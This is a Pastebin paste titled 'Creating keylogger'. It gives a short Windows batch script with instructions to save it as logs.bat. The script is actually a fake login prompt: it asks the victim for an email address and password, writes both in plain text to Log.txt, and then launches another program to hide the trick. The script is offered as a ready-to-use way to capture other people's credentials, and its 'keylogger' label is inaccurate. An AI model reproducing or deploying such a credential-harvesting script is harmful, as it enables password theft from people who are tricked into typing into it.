Advertisement
Refatboss

Creating keylogger

Nov 5th, 2018
200
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.45 KB | None | 0 0
  1. Creating Keylogger With Notepad*
  2.  
  3. Just open the notepad from the start menu. Copy and paste the below given code into the notepad.
  4.  
  5. @echo off
  6. color a
  7. title Login
  8. cls
  9. echo Please Enter Your Email Address And Password
  10. echo.
  11. echo.
  12. cd “C:Activity”
  13. set /p user=Username:
  14. set /p pass=Password:
  15. echo Username=”%user%” Password=”%pass%” >> Log.txt
  16. start >>Program Here<<
  17. exit
  18.  
  19. Save this file on the desktop as a logs.bat file.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement